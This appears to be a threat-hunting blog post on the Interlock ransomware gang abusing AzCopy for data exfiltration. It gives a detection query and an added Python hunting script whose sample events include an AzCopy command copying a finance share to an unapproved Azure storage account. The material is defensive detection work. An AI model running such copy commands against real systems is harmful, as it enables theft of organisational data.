204. Interlock Ransomware Gang Abuse AzCopy for Data Exfiltration

Hello everyone! Another legitimate tool abused by ransomware gangs - AzCopy. According to this cybersecurity advisory, the Interlock ransomware gang used the tool for data exfiltration. The tool allows the adversary to copy files from compromised systems to remote Azure storage. As the tool is legitimate, it's another great target for hunting, for example:

event_type: "processcreatewin" AND proc_file_path: "azcopy.exe"

Talking about Interlock, it's worth noting another tool in their arsenal we discussed earlier - Interlock RAT. See you tomorrow!
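
The hunt above, carried one step further as an added example (not code from the original post): it applies the same process-creation filter and then pulls the Azure storage account out of each AzCopy command line so that destinations outside an approved list stand out. The cmdline and host field names, the approved-account list and all sample events are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed sample events. event_type and proc_file_path are the fields
# used in the post's query; "cmdline" and "host" are assumed field names.
EVENTS = [
    {"event_type": "processcreatewin", "host": "FS01",
     "proc_file_path": r"C:\Users\Public\azcopy.exe",
     "cmdline": r'azcopy.exe copy "D:\Shares\Finance" '
                r'"https://examplestore01.blob.core.windows.net/c1" --recursive'},
    {"event_type": "processcreatewin", "host": "BKP02",
     "proc_file_path": r"C:\Tools\AzCopy\azcopy.exe",
     "cmdline": r'azcopy.exe copy "E:\Backups" '
                r'"https://corpbackups.blob.core.windows.net/nightly" --recursive'},
    {"event_type": "processcreatewin", "host": "WS07",
     "proc_file_path": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
]

# Storage accounts the organisation actually uses (constructed value).
APPROVED_ACCOUNTS = {"corpbackups"}

URL_RE = re.compile(r'https://[^\s"\']+', re.IGNORECASE)
STORAGE_SUFFIXES = (".blob.core.windows.net", ".file.core.windows.net",
                    ".dfs.core.windows.net")

def storage_accounts(cmdline):
    """Return Azure storage account names referenced in a command line."""
    accounts = []
    for url in URL_RE.findall(cmdline):
        host = (urlsplit(url).hostname or "").lower()
        if host.endswith(STORAGE_SUFFIXES):
            accounts.append(host.split(".", 1)[0])
    return accounts

def hunt(events, approved=APPROVED_ACCOUNTS):
    """Return one hit per AzCopy process creation, with unapproved accounts."""
    hits = []
    for ev in events:
        if ev.get("event_type") != "processcreatewin":
            continue
        path = ev.get("proc_file_path", "")
        if path.replace("/", "\\").rsplit("\\", 1)[-1].lower() != "azcopy.exe":
            continue
        unknown = [a for a in storage_accounts(ev.get("cmdline", ""))
                   if a not in approved]
        hits.append({"host": ev["host"], "path": path, "unapproved": unknown})
    return hits
```

Every AzCopy execution is still returned, as in the original query; the unapproved list only helps with triage order.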